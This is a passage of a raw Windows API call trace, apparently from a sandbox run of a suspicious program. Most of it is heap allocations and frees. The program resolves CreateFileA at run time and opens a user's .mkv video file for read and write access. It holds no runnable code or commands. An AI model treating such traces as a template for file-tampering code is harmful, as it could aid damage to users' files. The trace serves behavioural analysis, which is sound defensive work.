returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.882] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda98 [0198.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.882] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0198.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.882] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0198.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0198.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0198.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db138 [0198.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", cchWideChar=61, lpMultiByteStr=0x8db138, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv", lpUsedDefaultChar=0x0) returned 61 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.883] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\5sge4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0198.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a) returned 0x9c0c88 [0198.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=61, lpWideCharStr=0x9c0c88, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.mkv") returned 61 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0198.886] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.886] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.888] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0198.888] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.889] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.889] RtlAllocateHeap (HeapHandle=0x8a0000, 